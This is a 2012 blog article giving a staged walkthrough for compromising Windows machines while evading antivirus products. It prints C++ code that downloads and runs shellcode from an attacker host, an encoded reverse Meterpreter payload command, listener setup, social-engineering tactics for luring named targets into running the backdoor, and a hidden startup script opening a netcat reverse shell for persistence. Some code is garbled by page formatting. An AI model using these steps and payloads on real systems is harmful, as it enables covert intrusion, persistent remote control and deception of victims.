General security

Cloud Over: When Did Antivirus Stop Working?

October 23, 2012 by Elizabeth Shaw

What you will learn…

  • How to Bypass Antivirus
  • Easy Shell Code Creation
  • How to compile C++
  • How to write easy VBScript and Batch files
  • How to use Netcat

What you should know…

  • Basic knowledge of IT security

Sometime in June 2012 I was approached by InfoSec Institute and asked to write an article about exploiting software. I was really excited by this, and feeling very honoured to be asked, agreed with in seconds.

Then painfully over the next few months I tried and tried to write about exploiting software. And failed! So what have I written?

Well that’s simple: how to compromise any variant of Windows and not trigger most Antivirus. And when I mean any variant, stop thinking XP, In fact stop thinking of singular operating systems. Please start to think big, and welcome in the new breed of attacks.

These modern attacks don’t care if you’re fully patched, use a leading Antivirus, enable your host based IPS and have your firewall on. They also don’t care if you’re a home user reading a news site, or a central server used for managing a global cloud provider’s estate. And I understand what you’re thinking, alerts, alerts, cosmic screams of “we’re under attack!” Nope, the security world has gone silent.

So to start I will ask the big question. How do you bypass Antivirus? It’s a good question; a quick Google search for this question shows about 2,950,000 results! So many hits indicate an issue that raises another question: why is Antivirus’ ability to secure not publicly questioned?

Sorry I have no scientific or even a kind response to this. All I can say is, please read on if you feel like being shown a glimpse into the future of potential cyber-attacks.

Tools used during testing include Nmap, Metasploit, NetCat and Armitage1989 Advanced Backdoor.

Operating systems used while testing include Backtrack 5R1, Microsoft Windows XP, Server 2003, Windows 7, Server 2008 SP2.

Antivirus used during testing include F-Secure, Symantec including full SEP (Host IPS), Sophos, AVG 2012 and AVG 2013.

The exploit and following attacks are not zero-day: Armitage1989 Advanced Backdoor released Mar 8th 2012, Metasploit 2003, Nmap 1997 and Netcat 1996. During testing all AV alarms were triggered at varying stages, this helped in tuning this documented attack so it would not trigger an alarm. As some will be interested in knowing what did trigger an alarm, an example would be, once the test machine was exploited, starting Metasploit’s built in keylogger would trigger a general attack alarm (Some AV vendors would list Keylogger).

Another example, copying password hashes from exploited (Lab) machines would not trigger an AV alarm, but pushing the password hash back would alert as a Trojan. By the end of the testing period the complete compromise of all tested Windows variants raised no alarms of potential attack, virus, Trojan or unusual behaviour by any of the leading brands of Antivirus vendors. Yet we had received full remote admin access and uploaded a persistent backdoor.

Note AVG 2013 has been the hardest AV to manipulate so full marks and respect to them. It’s the only AV that picked up unusual behaviour during the use of Armitage1989 Advanced Backdoor. Interestingly, it triggered an Identity Alarm and offered to delete the affected application if required.

Due to the results gained from testing with AVG 2013 I was interested in seeing how popular this variant of AV was. The results proved to be quite amusing. It has a very low hold on the enterprise corporate world. Whereas in the home world it’s quite popular, I would imagine as it’s free, but the 2013 can be regarded as quite low in numbers. Personally if I used Windows machines I would now opt for AVG 2013.

Top Ten Reviews lists AVG as the fifth most popular AV in their top ten AV for 2012.

PC World’s top ten for 2011 doesn’t even list AVG???

CNET lists 1,003,018 downloads of AVG 2013.


Alright, with research on AV over, let’s get down to the fun parts.

This documented attack has been broken down into stages as follows.


Stage one – Setting up Apache in Backtrack 5 R1

Apache web server is built into Backtrack so no worries there. For those that don’t know Apache, it’s an open source web service. Most of the Internet is housed on it.

For interest please visit the NetcRaft web site. (Great site used by security pros and hackers! to find info on a server’s OS.) It also gives you a quick indication of what web services a site may use. anything saying Linux = 100% Apache. Search Microsoft @ (It’s just funny seeing so many Linux boxes they use.)


Stage two – Create a share folder that remote users can access via Apache service (http).

root@bt:~# mkdir /var/www/share

(Creates the folder)

root@bt:~# chmod -R 755 /var/www/share/

(Allows read and execute access)

root@bt:~# service apache2 start

(Starts Apache)

root@bt:~# firefox

(Test if the folder opens and can be seen in a web browser)


Stage three – Compile Armitage1989 Advanced Backdoor

Armitage1989 Advanced Backdoor is written in C++.

Advantages to its use: It doesn’t create a temp file on the Victim Machine.

It presently Evades Heur and Signature Based AV.

Local host and Physical Firewalls will not stop it as it uses port http for access.

And the combined Metasploit created bin file is mapped in memory.

To compile I used Dev-C++ for Windows it can be downloaded for free here.

This stage once completed will result in the creation of the Backdoor.exe file. This .exe has to be run by the victim.

Once Dev-C++ is installed, you need to follow these steps to compile the C++ code.

1. Create new project / Windows Application. Save location to where you like.

2. Delete all in the development window and paste in the code below. (I copy the code, then right click in the development window, select all and paste over the code.)

3. In the pasted code find and change the IP address to suit “http://Attacker-IP-Address/share/myexploit.bin” = “”

4. Under project window, right click on your project and click Project Options (or press Alt+p)

5. Find the Parameters tab and paste in under Linker “-lwininet”, press OK

6. Compile and save location to where you like. This will now have created Project1.exe (you can rename this as you like)

Armitage1989 Advanced Backdoor Code, copy below and paste into Dev-C++

//include library wininet this has the functions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),

using namespace std;

//this is a buffer with shellcode data in .bss section

unsigned char DataReceived[500];
int main(){
int i;

//this configure a HTTP agent to surf

//if for validate connection.
cout<return 0;

//Open a malicious url

HINTERNET OpenAddress = InternetOpenUrl(connect,”http://Attacker-IP-Address/share/myexploit.bin”, NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);
//this checks the handler for URL

[sourcecode language=”plain”]
if ( !OpenAddress )
DWORD ErrorNum = GetLastError();
return 0;

DWORD NumberOfBytesRead = 0;


//this recovers a file on the server and saves data into DataReceived
while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )

//this prints the data in format x00 you can delete this routine

for(i=0;i/*this routine is an other implementation of shellcode-test, but in this routine I use __asm () directive to call ASM instructions. 1) first I store a pointer to buffer in EAX register 2) push EAX, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode 3) the RET instruction, put the value of esp+4 into EIP and pass the execution 4) finally the shellcode in DataReceived is executed 5) the handler is closed. NOTE:You can put a nopsled before the shellcode to establish execution.Use freeconsole for hiding a DoS Windows
[plain] */ __asm (“lea _DataReceived, %eax”); __asm (“push %eax”); __asm (“ret”); } InternetCloseHandle(OpenAddress); InternetCloseHandle(connect); return 0; } [/plain]
———————————————————— Stage four – Using Metasploit create a Polymorphic Backdoor (Trojan) root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker-IP-Address LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘x00x0ax0d’ -c 1 x>/var/www/share/myexploit.bin Below lists what the above used switches mean. windows/meterpreter/reverse_tcp = Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) -e = The encoder to use. for this example we used x86/shikata_ga_nai x86/shikata_ga_nai = Polymorphic XOR Additive Feedback Encoder. In computer terminology, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence. Most anti-virus software and intrusion detection systems (IDS) attempt to locate malicious code by searching through computer files and data packets sent over a computer network. If the security software finds patterns that correspond to known computer viruses or worms, it takes appropriate steps to neutralize the threat. Polymorphic algorithms make it difficult for such software to recognise the offending code because it constantly mutates. -t = the output format. For this example we used raw. -a = the architecture to encode, as an example we used x86 (Intel microprocessor architecture also works with AMD). -b = the list of characters to avoid: ‘x00x0ax0d’ -c = the number of times to encode the data. Example uses x 1. -x = Specify an alternate executable template. Example pipes the finalised .bin file to folder /var/www/share/ ———————————————————— Stage five – Use a Metasploit listener
[plain] msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost Attacker-IP-Address
msf exploit(handler) > set lport 4445
msf exploit(handler) > exploit

[*] Started reverse handler on Attacker-IP-Address:4445
[*] Starting the payload handler…

Stage six – Social Engineer a victim into downloading and running the Stage three – created Project1.exe backdoor file.

A quick overview for easy social engineering:

1. Find people and not random people. Target what you want, find people connected to it. A great tool for this is Metagoofil.

Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf, doc, xls, ppt, odp, ods) available in the target/victim websites.

This is how to use Metagoofil in backtrack 5R1:
[sourcecode language=”plain”]
root@bt:~# cd /pentest/enumeration/google/metagoofil

Metagoofil options:

-d: domain to search
-t: filetype to download (pdf, doc, xls, ppt, odp, ods, docx, xlsx, pptx)
-l: limit of results to search (default 200)
-h: work with documents in directory (use “yes” for local analysis)
-n: limit of files to download
-o: working directory
-f: output file

root@bt:/pentest/enumeration/google/metagoofil# ./ -d -t doc,pdf -l 200 -n 200 -o /root/Desktop/results/ -f /root/Desktop/results.html


* Metagoofil Ver 2.1 – *
* Christian Martorella *
* *
* *
* Blackhat Arsenal Edition *


[-] Starting online search…
[-] Searching for doc files, with a limit of 200
Searching 200 results…
Searching 200 results…
Results: 11 files found

Starting to download 11 of them:
[+] List of users found:
James J
Janet smith
Josh M
Nicky Richards
[+] List of software found:
[+] List of e-mails found:

Ok so you got e-mails. E-mailing an .exe and asking them to download just wont work. So some possibilities that may work: You could try adding .exe to your Apache /var/www/share folder.

This will make it accessible over the web by any one. Then create an e-mail that advertises a product that requires the install of your created .exe and point the victim to the location.

Old school way (slow but works), befriend all the names found in the list generated by Metagoofil. Searching with an e-mail address in Google will often connect to a social network site profile, for example LinkedIn. If you’re lucky you’ll find one with a profile picture, grab this picture (right mouse click and keep hold of it), drag to a new tab and drop it into Google images search, see what you find?

Once you have gained the trust of the target, offer them the .exe as a solution to a problem they have. Seconds later your Metasploit listener will show [*] Meterpreter session 1 opened (PWN still makes me grin.)


Stage seven – So what happens!

Once the Victim tries to install the .exe file the Metasploit listener should spring into action as can be seen below.

msf exploit(handler) > exploit

[*] Started reverse handler on Attacker-IP-Address:4445
[*] Starting the payload handler…
[*] Sending stage (764928 bytes) to Victim-IP-Address
[*] Meterpreter session 1 opened (Attacker-IP-Address:4445 -> Victim-IP-Address:1056) at 1741-02-22 02:25:11 +0100

meterpreter >

At this stage it’s game over as you have direct remote access to the OS. Typically a Trojan would trigger an alarm in your chosen Antivirus product.

The combined use of Armitage1989 Advanced Backdoor and Metasploit Polymorphic .bin triggered no alert with Antivirus vendors, F-Secure, Symantec including full SEP (Host IPS), Sophos, or AVG 2012.

Using Wireshark shows that when the Victim tries to install the .exe file they send a HTTP request to the attacker and once the TCP window receives ACK the client downloads the Metasploit Polymorphic .bin

Victim-IP-Address Attacker-IP-Address TCP > http [SYN]

Attacker-IP-Address Victim-IP-Address TCP http > [SYN, ACK]

Victim-IP-Address Attacker-IP-Address TCP > http [ACK]

Victim-IP-Address Attacker-IP-Address HTTP GET /share/myexploit.bin HTTP/1.1

All traffic after this stage is using ports 1061 (TCP KIOSK) and 4445 (TCP UPNOTIFYP). Due to stateful firewalls these ports are not blocked as were required during HTTP access stage.

Note if you ever see an AV alert requesting a reboot to delete the found issue, do it as soon as you can as until you do the attacker may still have remote access!


Stage eight – Upload a persistent backdoor that does not trigger Antivirus.

Testing many backdoors with AV has left me realising the best is Netcat. Funny thing, downloading netcat.exe directly and placing on a Windows PC with AV often triggers an incorrect virus/Trojan alert.

Using the version of Netcat built into Nmap does not seem to trigger alerts. So install Nmap onto a Windows machine and once installed loot (copy) what you require from C:Program FilesNmap.

I looted the following programs and Dynamic-link library .dll files:






Stage nine – Create a .bat file and .vbs file in Windows notepad.

The .bat file is created to tell Windows once required to run Netcat with specified parameters. I tried placing this directly into C:Documents and SettingstestStart MenuProgramsStartup. Every time you logged into the OS, it would start Netcat, but opened a CMD box, making it very visible to all on the machine.

Research on how to make this CMD box invisible concluded in writing a simple VBScript (.vbs).

The .vbs file tells the PC to run the created .bat file invisibly (No CMD window opens).

This is what’s in the scripts:

nc.bat script

C:ncat.exe -v Attacker-IP-Address 443 -e cmd.exe (note replace Attacker-IP-Address with your IP address)

VBS.vbs script

Set WshShell = CreateObject(“WScript.Shell” )

WshShell.Run chr(34) & “C:nc.bat” & Chr(34), 0

Set WshShell = Nothing


Stage ten – Upload your goodies.

Metasploit has included a great upload tool. It’s really easy to use. Simply type “upload” and include the directory (file) and directory you want to send to.

From experimenting I discovered you can send groups of files by simply stating the directory and all included inside will be uploaded. Great as it’s quicker!

meterpreter > upload /root/nmap/ C:

[*] uploading : /root/nmap//ncat.exe -> C:ncat.exe

[*] uploaded : /root/nmap//ncat.exe -> C:ncat.exe

[*] uploading : /root/nmap//libeay32.dll -> C:libeay32.dll

[*] uploaded : /root/nmap//libeay32.dll -> C:libeay32.dll

[*] uploading : /root/nmap//VBS.vbs -> C:VBS.vbs

[*] uploaded : /root/nmap//VBS.vbs -> C:VBS.vbs

[*] uploading : /root/nmap//Notes -> C:Notes

[*] uploaded : /root/nmap//Notes -> C:Notes

[*] uploading : /root/nmap//nc.bat -> C:nc.bat

[*] uploaded : /root/nmap//nc.bat -> C:nc.bat

[*] uploading : /root/nmap//ssleay32.dll -> C:ssleay32.dll

[*] uploaded : /root/nmap//ssleay32.dll -> C:ssleay32.dll

[*] uploading : /root/nmap//nmap.exe -> C:nmap.exe

[*] uploaded : /root/nmap//nmap.exe -> C:nmap.exe

You need to move the created .vbs script to the start-up folder on the compromised Windows machine. To do this drop from meterpreter to the OS shell.

meterpreter > execute -f cmd.exe -c

Process 3176 created.

Channel 8 created.

meterpreter > shell

Process 3864 created.

Channel 11 created.

Microsoft Windows [Version 6]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:UserstestDocuments>move C:VBS.vbs “C:UserstestAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup”

1 file(s) moved.


Stage eleven – Testing

Reboot the exploited box to test if the start-up script works.

C:UserstestDocuments>shutdown -r -t 0

Back on backtrack, open a new terminal and set up nc listener.

Once the person reboots back into the account the VBS.vbs will run!

root@bt:~# nc -lvvp 443

listening on [any] 443 …

Remote-IP: inverse host lookup failed: Unknown server error : Connection timed out

connect to [Attackers-IP-Address] from (UNKNOWN) [Remote-IP] 49156

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.


Back in and no Antivirus alerts, and unless a human notices the addition of these files you will have access every time the person logs on.


Stage twelve – Exploit More

Quick review of two very important files I included in stage ten.

[*] uploading : /root/nmap//nmap.exe -> C:nmap.exe

[*] uploaded : /root/nmap//nmap.exe -> C:nmap.exe

Now if you had a home user you would not find much use in Nmap. Now if it was a central server, used for managing a global cloud provider’s estate, Nmap would be fun.


I hope you have enjoyed reading this article. Please support


Posted: October 23, 2012
Elizabeth Shaw
View Profile

Elizabeth Shaw has been working in IT for 20 years. She has Russian nationality, and writes along with many others for